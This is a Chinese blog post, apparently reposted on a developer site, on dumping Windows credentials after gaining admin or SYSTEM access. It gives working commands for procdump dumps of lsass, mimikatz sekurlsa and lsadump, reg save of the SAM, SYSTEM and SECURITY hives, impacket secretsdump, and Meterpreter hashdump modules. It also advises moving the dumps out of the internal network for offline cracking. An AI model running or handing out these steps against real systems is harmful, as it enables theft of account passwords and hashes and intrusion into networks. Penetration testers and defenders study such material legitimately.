内容简介:测试机器: Windows 10 1809Procdump(管理员权限下运行)
推荐使用 Procdump,reg 和 sharpdump 导出本地,再想办法从内网中运出来本地破解
测试机器: Windows 10 1809
0x01 Procdump + Mimikatz
Procdump
(管理员权限下运行)
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp //For 32 bits C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp //For 64 bits
然后本地解出hash即可
sekurlsa::minidump C:\lsass.dmp sekurlsa::logonpasswords full
0x02 Reg + impacket/Mimikatz (强推)
使用 Reg 需要NT/SYSTEM权限
reg save HKLM\SYSTEM system.hiv reg save HKLM\SAM sam.hiv reg save HKLM\security security.hiv
Mimikatz 调用 lsadump
lsadump::sam /system:system.hiv /sam:sam.hiv
impacket/secretsdump.py
python secretsdump.py -sam sam.hiv -security security.hiv -system system.hiv LOCAL
0x03 Sharpdump (强推)
Out-Minidump.ps1 的 C#版本 编译结果
需要.NET 3.5版本框架
0x04 Wce、Quarks PwDump、GetPass……
没怎么用过,都是以前比较老的,Getpass是Mimikatz的编译版本,没啥意思
0x05 Msf modules
hashdump
条件:
- Meterpreter Session
- NT/SYSTEM
hashdump只能dump本地用户
smart_hashdump
条件
- Meterpreter Session
- NT/SYSTEM
可以dump本地 + 域用户hash
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:
- 如何使用代理IP进行数据抓取,PHP爬虫抓取亚马逊商品数据
- 抓取 Grafana Panel 视图
- Python爬虫:抓取新浪新闻数据
- Python抓取花瓣网高清美图
- Python爬虫:抓取新浪新闻数据
- 灵巧工业机器人(一)抓取
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Java Web服务:构建与运行
Martin Kalin / 任增刚 / 电子工业出版社 / 2009年11月 / 45.00元
本书以示例驱动的方式详尽地介绍了XML Web服务(JAX-WS)和RESTful Web服务(JAX-RS)二者所涵盖的Java相关API。 《Java Web服务:构建和运行》这本书以清晰、务实的方法讲述Web服务相关技术,提供了混合性的架构总结、完全可以运行的代码示例,以及编译、部署和执行应用程序的一些短小精悍的指令。学习本书,读者将掌握如何从零开始编写Web服务或将已有的服务整合到现......一起来看看 《Java Web服务:构建与运行》 这本书的介绍吧!
